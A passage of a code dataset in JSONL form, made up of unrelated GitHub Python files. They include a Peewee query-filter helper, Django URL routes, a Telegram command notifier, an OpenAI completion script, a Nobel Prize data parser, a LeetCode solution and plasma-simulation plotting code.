QUERY_OPERATORS)\n\n\nclass Helper(object):\n    @staticmethod\n    def build_order_by(db_model: Type[Model], request_data: dict) -> list:\n        \"\"\"Build sorting fields with zero or more Column-like objects to\n        order by.\n\n        Example\n        -------\n        Peewee query: User.select().order_by(User.created_at.asc())\n\n        Request fields:\n        >>> from app.models.user import User\n        >>> db_model = User\n        >>> request_data = {'order': [{'sorting': 'asc', 'field_name': 'created_at'}]}\n        >>> Helper.build_order_by(db_model, request_data)\n        []\n\n        Notes\n        -----\n        It is currently not possible to order across joins.\n\n        References\n        ----------\n        http://docs.peewee-orm.com/en/latest/peewee/querying.html#sorting-records\n        http://docs.peewee-orm.com/en/latest/peewee/api.html#Query.order_by\n\n        \"\"\"\n        def build_ordering(field_name, sorting) -> peewee.Ordering:\n            field = getattr(db_model, field_name)\n            return getattr(field, sorting)()\n\n        order_by_values = []\n        request_order = request_data.get('order', [{'field_name': 'id',\n                                                    'sorting': 'asc'}])\n\n        if isinstance(request_order, list):\n            order_by_values = [\n                build_ordering(item.get('field_name'), item.get('sorting'))\n                for item in request_order\n            ]\n        return order_by_values\n\n    def build_string_clause(self, field: Field, field_operator: str,\n                            field_value) -> tuple:\n        \"\"\"Build string clauses.\n\n        The following string operators are available:\n        +------------+-----------------------------------------+\n        | Name       | Description                             |\n        +============+=========================================+\n        | eq         | x equals y                              |\n        +------------+-----------------------------------------+\n        | ne         | x is not equal to y                     |\n        +------------+-----------------------------------------+\n        | contains   | Wild-card search for substring          |\n        +------------+-----------------------------------------+\n        | 
ncontains | Wild-card not search for substring |\n +------------+-----------------------------------------+\n | startswith | Search for values beginning with prefix |\n +------------+-----------------------------------------+\n | endswith | Search for values ending with suffix |\n +------------+-----------------------------------------+\n\n Example\n -------\n TODO: Pending to define\n\n \"\"\"\n sql_clause = ()\n\n if field_value.find(REQUEST_QUERY_DELIMITER) != -1:\n field_value = field_value.split(REQUEST_QUERY_DELIMITER)\n sql_clauses = []\n\n for item in field_value:\n sql_clauses.append(self.build_string_clause(field,\n field_operator,\n item))\n sql_clause = reduce(operator.or_, sql_clauses)\n elif field_operator in STRING_QUERY_OPERATORS:\n if field_operator == 'eq':\n sql_clause = (field == field_value)\n elif field_operator == 'ne':\n sql_clause = (~(field == field_value))\n elif field_operator == 'contains':\n sql_clause = (field.contains(field_value))\n elif field_operator == 'ncontains':\n sql_clause = (~(field.contains(field_value)))\n elif field_operator == 'startswith':\n sql_clause = (field.startswith(field_value))\n elif field_operator == 'endswith':\n sql_clause = (field.endswith(field_value))\n\n return sql_clause\n\n def build_clause_operators(self, field: Field, field_operator: str,\n field_value) -> tuple:\n sql_clause = ()\n\n if isinstance(field_value, str) and field_value.find(REQUEST_QUERY_DELIMITER) != -1:\n field_value = field_value.split(REQUEST_QUERY_DELIMITER)\n sql_clauses = []\n\n for item in field_value:\n sql_clauses.append(self.build_clause_operators(field,\n field_operator,\n item))\n\n sql_clause = reduce(operator.or_, sql_clauses)\n elif field_operator in QUERY_OPERATORS:\n if field_operator == 'eq':\n sql_clause = (field == field_value)\n elif field_operator == 'ne':\n sql_clause = (field != field_value)\n elif field_operator == 'lt':\n sql_clause = (field < field_value)\n elif field_operator == 'lte':\n sql_clause = (field <= field_value)\n elif field_operator == 'gt':\n sql_clause = (field > field_value)\n elif field_operator == 'gte':\n sql_clause = (field >= field_value)\n elif field_operator == 'in':\n sql_clause = (field.in_(field_value.split(REQUEST_QUERY_DELIMITER)))\n elif field_operator == 'nin':\n sql_clause = (field.not_in(field_value))\n elif field_operator == 'between':\n values = field_value.split(REQUEST_QUERY_DELIMITER)\n sql_clause = (field.between(lo=values[0], hi=values[1]))\n return sql_clause\n\n def build_sql_expression(self, field: Field, field_operator: str,\n field_value):\n if isinstance(field, (CharField, FixedCharField, TextField, UUIDField)):\n sql_clause = self.build_string_clause(field, field_operator,\n field_value)\n else:\n sql_clause = self.build_clause_operators(field, field_operator,\n field_value)\n return sql_clause\n\n\nclass RequestQueryOperator(object):\n @staticmethod\n def create_search_query(db_model: Type[Model], query: ModelSelect,\n data: dict = None) -> ModelSelect:\n if data is None:\n data = {}\n\n filters = data.get('search', {})\n sql_expressions = []\n helper = Helper()\n\n for filter in filters:\n field = getattr(db_model, filter['field_name'])\n field_value = filter['field_value']\n\n if isinstance(field_value, str) and not field_value.strip():\n continue\n\n sql_expression = helper.build_sql_expression(field,\n filter['field_operator'],\n field_value)\n sql_expressions.append(sql_expression)\n\n if sql_expressions:\n query = query.where(*sql_expressions)\n\n return query\n\n @staticmethod\n 
def get_request_query_fields(db_model: Type[Model],\n request_data=None) -> tuple:\n request_data = request_data or {}\n\n # Page numbers are 1-based, so the first page of results will be page 1.\n # http://docs.peewee-orm.com/en/latest/peewee/querying.html#paginating-records\n page_number = int(request_data.get('page_number', 1))\n items_per_page = int(request_data.get('items_per_page', 10))\n order_by = Helper.build_order_by(db_model, request_data)\n return page_number, items_per_page, order_by\n","repo_name":"Rubenrod18/flask_api","sub_path":"app/utils/request_query_operator.py","file_name":"request_query_operator.py","file_ext":"py","file_size_in_byte":8241,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"31116990145","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('create/', views.create, name='create'),\n path('list/', views.list, name='list'),\n\n path('delete_time_confirm//', views.delete_time_confirm, name='delete_time_confirm'),\n path('delete_time//', views.delete_time, name='delete_time'),\n\n path('/', views.manage, name='manage'),\n\n path('/delete_music//', views.delete_music, name='delete_music'),\n path('/delete_music_confirm//', views.delete_music_confirm, name='delete_music_confirm'),\n\n path('/delete_player_confirm///', views.delete_player_confirm, name='delete_player_confirm'),\n path('/delete_player///', views.delete_player, name='delete_player'),\n\n path('/insta_upload/', views.insta_upload, name='insta_upload'),\n path('/update_tv_music//', views.update_tv_music, name='upate_tv_music'),\n path('/edit_music//', views.edit_music, name='edit_music'),\n]","repo_name":"GTPV/time_manager_sorijigi","sub_path":"time_manager/time_manage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"503055095","text":"import sys\nfrom azureTTS import *\nfrom brain import *\n\ncmds = [['hi','hello','hey'],['time'],['day','date','month','year'],['list','processes','process'],['bye','stop','exit'],['wiki', 'who', 'what'],['who', 'you'],['do', 'what', 'you']]\n\ndef think(text):\n processed = processText(text) \n if any(i in cmds[0] for i in processed):\n return greetings()\n elif cmds[6] == processed:\n speak(\"Hello, I am Sunday your personal Assistant. I was created to help you in all your needs. To know more about what i can do ask \\'what can you do\\'\")\n elif cmds[7] == processed:\n return helper()\n elif any(i in cmds[1] for i in processed):\n return showTime()\n elif any(i in cmds[2] for i in processed):\n return showDate()\n elif any(i in cmds[3] for i in processed):\n return listProcess()\n elif any(i in cmds[4] for i in processed):\n return farewell()\n elif any(i in cmds[5] for i in processed):\n return wiki(\" \".join(processed[1:]))\n else:\n speak(\"Sorry I didn't quite catch that!\")\n\nthink(sys.argv[1])","repo_name":"Thanigaivels/sunday","sub_path":"core/sundayText.py","file_name":"sundayText.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23663527323","text":"#!/usr/bin/env python\n\nimport sys\nimport subprocess\nimport random\nfrom . 
import TelegramBotAPI as TG\nfrom .Constants import BOLD, ITALIC\nfrom .Constants import UTF8\n\nsubtitles = ['Go back to work, you lazy piece of crap!',\n             'Terminate rapidito el pucho y a seguir...',\n             'No seas tan vagazo, que en cualquier momento te rajan']\n\ndef send_message(command, output):\n    # clean output\n    output = output.split(b'\\x07')[-1].decode(UTF8)\n    # create message\n    title = f'Command {BOLD.format(command)} finished running!'\n    subtitle = ITALIC.format(random.sample(subtitles, 1)[0])\n    body = f'-------- {BOLD.format(\"OUTPUT\")} -------- \\n{output}'\n    TG.send_message(title, body, subtitle)\n\ndef run_command():\n    # run given command\n    command = ' '.join(sys.argv[1:])\n    zsh_command = \"/bin/zsh -i -c '{}'\".format(command)\n    process = subprocess.Popen(zsh_command,\n                               shell=True,\n                               stdout=subprocess.PIPE,\n                               stderr=subprocess.PIPE)\n\n    # retrieve output\n    out, err = process.communicate()\n    output = out if not process.returncode else err\n\n    # send output\n    print(f'\\n{output.decode(UTF8)}')\n    send_message(command, output)\n\ndef main():\n    run_command()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"rusito-23/tg-notify","sub_path":"src/TelegramCommandNotify.py","file_name":"TelegramCommandNotify.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15547159859","text":"import openai\n\n#use your own OpenAI API key\nopenai.api_key = 'YOUR_API_KEY'\n\n\n#OpenAI completes your keywords\ndef grab_completed_text(stext):\n    response = openai.Completion.create(\n      engine=\"text-davinci-002\",\n      prompt=stext,\n      temperature=0.7,\n      max_tokens=4000,\n      top_p=1,\n      frequency_penalty=0,\n      presence_penalty=0\n    )\n    return response['choices'][0]['text']\n\n\n\n\n# stores queries here\nchosen_keywords = []\n\n\n# opens the people-also-ask.txt file to read the questions\nfile_open_paan = open('people-also-ask.txt', 'r')\nchosen_keywords = file_open_paan.read().splitlines()\noriginal_keyword_untrimmed = chosen_keywords[0].split(' ')\noriginal_keyword = \" \".join(original_keyword_untrimmed[1:])\nchosen_keywords.pop(0)\n\n#removes previous text from the file 'openai-completed-description.txt'\nopen('openai-completed-description.txt', 'w').close()\n\n# completes the introduction query\nintroduction_query = \"Write an article introduction about \" + original_keyword\nopenai_completed_introduction = grab_completed_text(introduction_query)\nfile_open = open(\"openai-completed-description.txt\", 'a')\nfile_open.write(\"Introduction\\n\\n\")\nfile_open.write(f'{openai_completed_introduction}\\n\\n')\nfile_open.write(\"\\n\\n\")\n\n# completes people-also-ask queries\nfor keyword in chosen_keywords:\n    completed_text = grab_completed_text(keyword)\n    file_open = open(\"openai-completed-description.txt\", 'a')\n    file_open.write(f'{keyword}\\n')\n    file_open.write(f'{completed_text}\\n\\n')\n    file_open.write(\"\\n\\n\")\n\n# completes the conclusion query\nconclusion_query = \"Write an article conclusion about \" + original_keyword\nopenai_completed_introduction = grab_completed_text(conclusion_query)\nfile_open = open(\"openai-completed-description.txt\", 
'a')\nfile_open.write(\"Conclusion\\n\\n\")\nfile_open.write(f'{openai_completed_introduction}\\n\\n')\nfile_open.write(\"\\n\\n\")","repo_name":"munna505/OpenAI-autocompletion","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1844636038","text":"from const import *\nfrom event import *\nfrom card import *\n\n\n\ndef init(self):\n self.typ = BUFF_DYNAMIC\n self.original = True\n self.visable = False\n self.name = \"读心术\"\n self.description = \"使用: 查看并选择对方一张手牌。你使用该牌, 并且无需支付其法力。不能使用时将会弃掉该牌。\"\n\n def after_usecard(self, old_event):\n if not old_event.param[0] == self.card:\n return False\n \n group = []\n for card in self.system.cards:\n if (card.place == PLACE_HAND) and (card.player != self.card.player) and (not card.unselectable(card, self.card.player)):\n group.append(card)\n if len(group) <= 0:\n return False\n\n self.system.yell(card, 0)\n text = \"请选择一张卡片来使用。不能使用的场合将弃掉。\"\n targets = self.card.player.select(group, 1, text, 0, True, self)\n \n target = targets[0]\n sublists = [\"tinystar\"]\n self.system.playeffect(\"whiteball\", sublists, None, target)\n self.system.yell(card)\n \n old_player = target.player\n target.player = self.card.player\n if (target.unusable(target)):\n # 弃掉的场合\n target.player = old_player\n param = [[target], PLACE_GRAVE, False, False, False, False, True]\n event = Event(self.system, EVENT_MOVE, self, param)\n event.do()\n else:\n # 使用的场合\n parame = [target, None, True, False]\n event = Event(self.system, EVENT_USECARD, None, parame)\n event.do()\n \n\n self.after_usecard = after_usecard\n","repo_name":"zblcm/python-StoneAsh","sub_path":"server/buffs/b0000000009_000.py","file_name":"b0000000009_000.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"829586221","text":"from typing import Union, Iterator\n\nfrom data import AnswerRepository\nfrom data.db import open_cursor\nfrom data.entities import SubmissionAnswer, Submission\nfrom data.fieldset import EntityFields, FieldSet\n\n\nclass SubmissionAnswerRepository:\n fields = EntityFields(\n ['submission_id', 'answer_id'],\n SubmissionAnswer, 'submission_answers')\n\n @staticmethod\n def insert(submission_answer: SubmissionAnswer):\n with open_cursor() as cur:\n cur.execute(\n \"INSERT INTO submission_answers(submission_id, answer_id)\"\n \"VALUES (%s, %s);\",\n [submission_answer.submission_id, submission_answer.answer_id])\n\n @staticmethod\n def get_by_submission_join_answers(submission: Union[int, Submission]) -> Iterator[SubmissionAnswer]:\n fs = FieldSet(SubmissionAnswerRepository.fields, AnswerRepository.fields)\n if isinstance(submission, Submission):\n fs.constructor = lambda sa, a: sa.set_submission(submission).set_answer(a)\n else:\n fs.constructor = lambda sa, a: sa.set_answer(a)\n\n submission_id = int(submission)\n with open_cursor() as cur:\n cur.execute(\n f\"SELECT {fs} \"\n \"FROM submission_answers JOIN answers ON submission_answers.answer_id = answers.id \"\n \"WHERE submission_answers.submission_id = %s\",\n [submission_id])\n for submission_answer in fs.unpack_iter(cur):\n yield 
submission_answer\n","repo_name":"kononovarseniy/ar-forms","sub_path":"app/data/SubmissionAnswerReposiory.py","file_name":"SubmissionAnswerReposiory.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17828083419","text":"import json\nimport logging\nimport random\nfrom typing import List\n\nimport pandas as pd\nimport requests\n\nLOG_FILE = \"log.log\"\n\nlogging.basicConfig(level=logging.DEBUG, format=\"%(asctime)s - %(levelname)s - %(message)s\",\n filename=LOG_FILE, filemode='w')\n\n\nclass NobelPriceParser:\n def __init__(self, laureate_url: str, country_url: str):\n \"\"\"\n :arg laureate_url: url, country_url: url\n \"\"\"\n # Getting response from url\n self.res_laureate = requests.get(laureate_url)\n self.res_country = requests.get(country_url)\n\n # Check for response from the url\n if self.res_laureate.status_code != 200:\n logging.exception(\"Response Status of laureate : \" + self.res_laureate.status_code)\n print(\n f\"There is a error with the laureate url {laureate_url} status code : {self.res_laureate.status_code}\")\n exit()\n elif self.res_laureate.status_code != 200:\n logging.exception(\"Response Status of laureate : \" + self.res_country.status_code)\n print(f\"There is a error with the laureate url {laureate_url} status code : {self.res_country.status_code}\")\n exit()\n # Convertig the response to dataframe\n self.laureate_dataframe = pd.json_normalize(json.loads(self.res_laureate.content.decode('utf-8'))['laureates'])\n self.country_dataframe = pd.json_normalize(json.loads(self.res_country.content.decode('utf-8'))['countries'])\n\n def parser(self):\n \"\"\"\n No args requireds\n Funtion is called to process the data\n \"\"\"\n self.laureate_dataframe[\"name\"] = self.laureate_dataframe[\"firstname\"] + \" \" + self.laureate_dataframe[\n \"surname\"]\n logging.debug(\"name column is created\")\n\n self.laureate_dataframe.rename(columns={\"born\": \"dob\"}, inplace=True)\n logging.debug(\"born is renamed to dob\")\n\n self.laureate_dataframe[\"unique_prize_years\"] = self.laureate_dataframe[\"prizes\"].apply(\n lambda x: self.concat_data(prize=x, prize_key=\"year\"))\n logging.debug(\"unique_prize_years column is created\")\n\n self.laureate_dataframe[\"unique_prize_categories\"] = self.laureate_dataframe[\"prizes\"].apply(\n lambda x: self.concat_data(prize=x, prize_key=\"category\"))\n logging.debug(\"unique_prize_categories column is created\")\n\n self.laureate_dataframe[\"born_country_code_mapped\"] = self.laureate_dataframe[\"bornCountryCode\"] \\\n .apply(lambda x: self.born_country_code_mapper(country_code=x))\n logging.debug(\"born_country_code_mapped column is created\")\n\n self.laureate_dataframe = self.laureate_dataframe[\n [\"id\", \"name\", \"dob\", \"unique_prize_years\", \"unique_prize_categories\", \"gender\",\n \"born_country_code_mapped\"]]\n self.laureate_dataframe.set_index(\"id\", inplace=True)\n logging.debug(\"Selecting only required columns\")\n\n logging.debug(\"parser completed successfully\")\n\n def concat_data(self, prize: List[dict], prize_key: str) -> str:\n \"\"\"\n :arg Prize column which is list of dictionaries\n :return string\n Helper function for concatenating data\n \"\"\"\n res = [i.get(prize_key) for i in prize if i.get(prize_key)]\n return \";\".join(res) if res else pd.NA\n\n def born_country_code_mapper(self, country_code: str):\n \"\"\"\n :arg country_code: string\n \"\"\"\n r = 
self.country_dataframe[self.country_dataframe[\"code\"] == country_code]\n        if r.size > 0:\n            # Choosing random country as there are multiple countries\n            # with the same symbol (mentioned in point 7 of assignment)\n            r = r.head(random.randint(1, len(r)))\n            return r[\"name\"].values[0]\n        else:\n            return pd.NA\n\n    def save(self, filename: str):\n        logging.debug(\"Saving dataframe\")\n        self.laureate_dataframe.to_csv(filename)\n\n\nif __name__ == '__main__':\n    npp = NobelPriceParser(laureate_url=\"http://api.nobelprize.org/v1/laureate.json\",\n                           country_url=\"http://api.nobelprize.org/v1/country.json\")\n    npp.parser()\n    npp.save(filename=\"out.csv\")\n","repo_name":"AjayPrasath01/NobelPrize","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2672187639","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    @Time    : 2020/6/28 8:47\n    @Author  : QDY\n    @FileName: 209. 长度最小的子数组.py\n\n    Given an array of n positive integers and a positive integer s, find the minimal-length\n    contiguous subarray whose sum is >= s, and return its length. If there is no such\n    subarray, return 0.\n\n    Example:\n    Input: s = 7, nums = [2,3,1,2,4,3]\n    Output: 2\n    Explanation: the subarray [4,3] is the shortest contiguous subarray meeting the condition.\n\n    Follow-up:\n    If you have figured out the O(n) solution, try to code a solution with O(n log n) time complexity.\n\n\"\"\"\n\n\nclass Solution:\n    def minSubArrayLen(self, target, nums):\n        if not nums: return 0\n        #\n        n = len(nums)\n        res = n + 1\n        l, r, sum_ = 0, 0, 0\n        while r < n:  # sliding window O(n)\n            while sum_ < target and r < n:\n                sum_ += nums[r]\n                r += 1\n            while sum_ >= target:\n                res = min(res, r - l)\n                sum_ -= nums[l]\n                l += 1\n        return 0 if res == n + 1 else res\n\n        # # prefix sum + binary search O(nlogn)\n        # prefix = [0]\n        # for i in range(n):\n        #     prefix.append(prefix[-1]+nums[i])\n        # if prefix[-1] < target: return 0\n        # res = n + 1\n        # for i in range(n):\n        #     l, r = i, n\n        #     while l <= r:\n        #         mid = (l + r) // 2\n        #         if prefix[mid] - prefix[i] >= target:\n        #             r = mid - 1\n        #         else:\n        #             l = mid + 1\n        #     if l <= n:\n        #         res = min(res, l - i)\n\n        # return res\n","repo_name":"QDylan/Learning-","sub_path":"Leetcode/209. 长度最小的子数组.py","file_name":"209. 
长度最小的子数组.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37619946718","text":"\"\"\" \"\"\"\n\nimport sys\nsys.path.append(\"../postprocessing_tools\")\nfrom plotting_helper import make_beta_scan_plots, make_comparison_plots, plot_gmvus, plot_gzvs\nfrom plotting_helper import make_comparison_plots_for_poster\nfrom helper_ncdf import view_ncdf_variables, extract_data_from_ncdf\nfrom extract_sim_data import find_bpar_phi_ratio, find_apar_phi_ratio\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport make_param_scans as mps\n\nIMAGE_DIR = \"./images/\"\n### Give the names of all the sims here - avoids needing to type them out\n### in the methods.\n\n## fapar = 0\n# stella\nsim_st_b00001_fapar0 = \"stella_beta0.00001_fapar0/input\"\nsim_st_b001_fapar0 = \"stella_beta0.001_fapar0/input\"\nsim_st_b002_fapar0 = \"stella_beta0.002_fapar0/input\"\nsim_st_b01_fapar0 = \"stella_beta0.010_fapar0/input\"\n# gs2\nsim_gs2_b00001_fapar0 = \"gs2_beta_scan_fapar0/_0.00001\"\nsim_gs2_b001_fapar0 = \"gs2_beta_scan_fapar0/_0.0010\"\nsim_gs2_b002_fapar0 = \"gs2_beta_scan_fapar0/_0.0020\"\nsim_gs2_b01_fapar0 = \"gs2_beta_scan_fapar0/_0.0100\"\n\n## fbpar = 0\n# stella\nsim_st_b00001_fbpar0 = \"stella_beta0.00001_fbpar0/input\"\nsim_st_b00005_fbpar0 = \"stella_beta0.00005_fbpar0/input\"\nsim_st_b0001_fbpar0 = \"stella_beta0.0001_fbpar0/input\"\nsim_st_b0003_fbpar0 = \"stella_beta0.0003_fbpar0/input\"\nsim_st_b0006_fbpar0 = \"stella_beta0.0006_fbpar0/input\"\nsim_st_b0015_fbpar0 = \"stella_beta0.0015_fbpar0/input\"\nsim_st_b002_fbpar0 = \"stella_beta0.002_fbpar0/input\"\nsim_st_b003_fbpar0 = \"stella_beta0.003_fbpar0/input\"\nsim_st_b004_fbpar0 = \"stella_beta0.004_fbpar0/input\"\nsim_st_b005_fbpar0 = \"stella_beta0.005_fbpar0/input\"\nsim_st_b01_fbpar0 = \"stella_beta0.010_fbpar0/input\"\n#######\nsim_st_b001_fbpar0 = \"stella_beta0.001_fbpar0/input\"\nsim_st_b001_fbpar0_np2 = \"stella_beta0.001_fbpar0/input_np2\"\nsim_st_b001_fbpar0_np6 = \"stella_beta0.001_fbpar0/input_np6\"\nsim_st_b001_fbpar0_nzed32 = \"stella_beta0.001_fbpar0/input_nzed32\"\nsim_st_b001_fbpar0_nzed128 = \"stella_beta0.001_fbpar0/input_nzed128\"\nsim_st_b001_fbpar0_no_drive = \"stella_beta0.001_fbpar0/input_zero_drive\"\nsim_st_b001_fbpar0_no_drive_no_stream_no_mirror = \"stella_beta0.001_fbpar0/input_zero_drive_zero_streaming_zero_mirror\"\nsim_st_b001_fbpar0_no_stream_no_mirror = \"stella_beta0.001_fbpar0/input_zero_streaming_zero_mirror\"\nsim_st_b001_fbpar0_no_drive_0_upwind = \"stella_beta0.001_fbpar0/input_zero_drive_no_upwinding\"\nsim_st_b001_fbpar0_no_drive_01_upwind = \"stella_beta0.001_fbpar0/input_zero_drive_more_upwinding\"\nsim_st_b001_fbpar0_no_drive_02_upwind = \"stella_beta0.001_fbpar0/input_zero_drive_0.2_upwinding\"\nsim_st_b001_fbpar0_no_drive_mid_vres = \"stella_beta0.001_fbpar0/input_zero_drive_mid_vres\"\nsim_st_b001_fbpar0_no_drive_higher_vres = \"stella_beta0.001_fbpar0/input_zero_drive_higher_vres\"\n# NB _no_drive_no_drifts has diamagnetic and curvature drifts set to zero\nsim_st_b001_fbpar0_no_drive_no_drifts = \"stella_beta0.001_fbpar0/input_zero_drive_zero_drifts\"\nsim_st_b001_fbpar0_no_drive_lower_dt = \"stella_beta0.001_fbpar0/input_zero_drive_lower_dt\"\n# NB has diamagnetic but no curvature drifts\nsim_st_b001_fbpar0_no_mag_drift = \"stella_beta0.001_fbpar0/input_no_drifts\"\nsim_st_b001_fbpar0_no_mirror = \"stella_beta0.001_fbpar0/input_no_mirror\"\nsim_st_b001_fbpar0_no_streaming = 
\"stella_beta0.001_fbpar0/input_no_streaming\"\nsim_st_b001_fbpar0_no_zed_upwind = \"stella_beta0.001_fbpar0/input_no_zed_upwinding\" ## Doesn't actually do anything\nsim_st_b001_fbpar0_centered_dgdz = \"stella_beta0.001_fbpar0/input_centered_dgdz\"\nsim_st_b001_fbpar0_centered_dgdvpa = \"stella_beta0.001_fbpar0/input_centered_dgdz_and_dgdvpa\"\nsim_st_b001_fbpar0_centered_dgdvpa_dgdvpa = \"stella_beta0.001_fbpar0/input_centered_dgdz_and_dgdvpa\"\nsim_st_b001_fbpar0_centered_dgdvpa_dgdvpa_numapar = \"stella_beta0.001_fbpar0/input_centered_dgdz_and_dgdvpa_num_apar_fac\"\nsim_st_b001_fbpar0_equal_masses = \"stella_beta0.001_fbpar0_equal_masses/input\"\nsim_st_b001_fbpar0_flipflop = \"stella_beta0.001_fbpar0/input_np5_flipflop\"\n###################\n# gs2\nsim_gs2_b00001_fbpar0 = \"gs2_beta_scan_fbpar0/_0.00001\"\nsim_gs2_b001_fbpar0 = \"gs2_beta_scan_fbpar0/_0.0010\"\nsim_gs2_b001_fbpar0_equal_masses = \"gs2_beta_scan_fbpar0/_0.0010_me1\"\nsim_gs2_b002_fbpar0 = \"gs2_beta_scan_fbpar0/_0.0020\"\nsim_gs2_b003_fbpar0 = \"gs2_beta_scan_fbpar0/_0.0030\"\nsim_gs2_b004_fbpar0 = \"gs2_beta_scan_fbpar0/_0.0040\"\nsim_gs2_b005_fbpar0 = \"gs2_beta_scan_fbpar0/_0.0050\"\nsim_gs2_b01_fbpar0 = \"gs2_beta_scan_fbpar0/_0.0100\"\nsim_gs2_b03 = \"gs2_beta0.03/_0.0300\"\nsim_gs2_b03_hvr = \"gs2_beta0.03/_0.0300_higher_vres\"\nsim_gs2_b01 = \"gs2_beta0.01/_0.0100\"\nsim_gs2_b03_fbpar0 = \"gs2_beta0.03_fbpar0/_0.0300\"\nsim_gs2_b03_fapar0 = \"gs2_beta0.03_fapar0/_0.0300\"\n\n## fapar=1, fbpar=1\nsim_st_b0 = \"stella_beta0.000/input\"\nsim_st_b005 = \"stella_beta0.005/input\"\nsim_st_b01 = \"stella_beta0.010/input\"\nsim_st_b01_fbpar0_new = \"stella_fapar1_fbpar0_beta_scan/beta_0.01000\"\nsim_st_b015 = \"stella_beta0.015/input\"\nsim_st_b02 = \"stella_beta0.020/input\"\nsim_st_b025 = \"stella_beta0.025/input\"\n#sim_st_b03 = \"stella_beta0.030/input\"\nsim_st_b03 = \"stella_beta0.03/beta_0.03000\"\nsim_st_b03_fapar0 = \"stella_beta0.03_fapar0/beta_0.03000\"\nsim_st_b03_fbpar0 = \"stella_beta0.03_fbpar0/beta_0.03000\"\n\n### Local sims\nsim_st_gfvmulo_nstep100 = \"local_sims/stella_lr_gfvmulo_nstep100\"\nsim_st_gf_nstep100 = \"local_sims/stella_lr_gf_nstep100\"\nsim_st_gfvmulo_nstep1000 = \"local_sims/stella_lr_gfvmulo_beta1_nstep1000\"\nsim_st_gf_nstep1000 = \"local_sims/stella_lr_gf_beta1_nstep1000\"\n\n## The pickled files summarising G2 beta scans\npickle_gs2 = \"gs2_beta_scan/omega_values.pickle\"\npickle_gs2_fbpar0 = \"gs2_beta_scan_fbpar0/omega_values.pickle\"\n\ndef analyse_fbpar0_beta0001_results():\n \"\"\"Compare sims, all with fbpar=0, fapar=1, beta=0.001, for which\n we try turning on and off different knobs.\"\"\"\n\n make_comparison_plots([\n sim_st_b001_fbpar0,\n sim_st_b001_fbpar0_no_drive,\n sim_st_b001_fbpar0_no_mag_drift,\n sim_st_b001_fbpar0_no_mirror,\n sim_st_b001_fbpar0_equal_masses,\n sim_st_b001_fbpar0_flipflop,\n sim_st_b001_fbpar0_no_streaming,\n sim_gs2_b001_fbpar0\n ],\n [\n \"stella\",\n \"stella, zero gradients\",\n \"stella, no magnetic drifts\",\n \"stella, no mirror term\",\n \"stella, m_e=1\",\n \"stella, flip-flop\",\n \"stella, no streaming\",\n \"GS2\"\n ],\n \"images/termsoff_beta_0.001_fbpar0\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n # \"stella\",\n \"gs2\"\n ],\n plot_apar=True,\n plot_format=\".eps\"\n )\n make_comparison_plots([\n sim_st_b001_fbpar0,\n sim_st_b001_fbpar0_np2,\n sim_st_b001_fbpar0_np6,\n sim_gs2_b001_fbpar0\n ],\n [\n \"stella\",\n \"stella, nperiod=2\",\n \"stella, nperiod=6\",\n 
\"GS2\"\n ],\n \"images/beta_0.001_fbpar0_nperiod_scan\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n \"gs2\"\n ],\n plot_apar=True,\n plot_format=\".eps\"\n )\n make_comparison_plots([\n sim_st_b001_fbpar0,\n sim_st_b001_fbpar0_nzed32,\n sim_st_b001_fbpar0_nzed128,\n sim_gs2_b001_fbpar0\n ],\n [\n \"stella\",\n \"stella, nzed=32\",\n \"stella, nzed=128\",\n \"GS2\"\n ],\n \"images/beta_0.001_fbpar0_nzed_scan\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n \"gs2\"\n ],\n plot_apar=True,\n plot_format=\".png\"\n )\n make_comparison_plots([\n sim_st_b001_fbpar0,\n sim_st_b001_fbpar0_centered_dgdz,\n sim_st_b001_fbpar0_centered_dgdvpa_dgdvpa,\n #sim_st_b001_fbpar0_centered_dgdvpa_dgdvpa_numapar,\n sim_gs2_b001_fbpar0\n ],\n [\n \"stella, dg/dz third-order-upwind\",\n \"stella, dg/dz centered on proc0\",\n \"stella, dg/dz centered on all procs\",\n #\"stella, dg/dz centered, dg/dvpa centered, num.\",\n \"GS2\"\n ],\n \"images/beta_0.001_fbpar0_dgdz_centering\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n #\"stella\",\n \"gs2\"\n ],\n plot_apar=True,\n plot_format=\".png\"\n )\n compare_omega_for_fbpar0_changing_streaming_and_drive()\n\n return\n\ndef analyse_results_for_poster():\n \"\"\"Compare sims, all with fbpar=1, fapar=1, beta=0.01, for which\n we try turning on and off different knobs.\"\"\"\n\n # make_comparison_plots_for_poster([\n # sim_st_b01,\n # sim_gs2_b01\n # ],\n # [\n # \"stella\",\n # \"GS2\"\n # ],\n # \"images/beta_0.01_poster\",\n # sim_types=[\n # \"stella\",\n # \"gs2\"\n # ],\n #\n # )\n\n make_comparison_plots_for_poster([\n sim_st_b03,\n 